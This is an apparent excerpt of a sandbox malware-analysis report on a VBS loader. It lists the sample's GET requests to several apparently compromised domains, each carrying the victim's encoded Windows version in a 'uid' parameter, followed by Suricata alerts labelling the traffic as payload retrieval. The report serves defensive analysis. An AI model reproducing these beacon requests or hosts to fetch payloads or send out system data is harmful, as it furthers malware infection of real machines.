160.153.128.4:80 (cheron.co.uk) | GET | cheron.co.uk/location/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA | GET /location/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1<br>Connection: Keep-Alive<br>Accept: */*<br>Accept-Language: en-us<br>User-Agent: FoxKids<br>Host: cheron.co.uk |
160.153.129.23:80 (gabinetedepsicologia.com) | GET | gabinetedepsicologia.com/location/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA | GET /location/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1<br>Connection: Keep-Alive<br>Accept: */*<br>Accept-Language: en-us<br>User-Agent: FoxKids<br>Host: gabinetedepsicologia.com |
23.229.248.72:80 (clusterlacteoatlantico.com) | GET | clusterlacteoatlantico.com/location/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACA... | GET /location/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1<br>Connection: Keep-Alive<br>Accept: */*<br>Accept-Language: en-us<br>User-Agent: FoxKids<br>Host: clusterlacteoatlantico.com |
23.229.248.72:80 (clusterlacteoatlantico.com) | GET | clusterlacteoatlantico.com/location/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACA... | GET /location/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1<br>Connection: Keep-Alive<br>Accept: */*<br>Accept-Language: en-us<br>User-Agent: FoxKids<br>Host: clusterlacteoatlantico.com |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 23.229.248.72:80 (TCP) | A Network Trojan was detected | ETPRO MALWARE Unk.VBSLoader Retrieving Payload | 2841137 |
local -> 160.153.129.23:80 (TCP) | A Network Trojan was detected | ETPRO MALWARE Unk.VBSLoader Retrieving Payload | 2841137 |
local -> 160.153.128.4:80 (TCP) | A Network Trojan was detected | ETPRO MALWARE Unk.VBSLoader Retrieving Payload | 2841137 |
local -> 23.229.248.72:80 (TCP) | A Network Trojan was detected | ETPRO MALWARE Unk.VBSLoader Retrieving Payload | 2841137 |
Extracted Strings
Extracted Files
No significant files were extracted.
Notifications
-
Runtime
- Although all strings were processed, some are hidden from the report in order to reduce the overall size
- Enforcing malicious verdict, as a reliable source indicates high confidence
- Network whitenoise filtering (Process) was applied
- Not all Falcon MalQuery lookups completed in time
- Not all sources for indicator ID "api-55" are available in the report
- Not all sources for indicator ID "api-64" are available in the report
- Not all sources for indicator ID "registry-72" are available in the report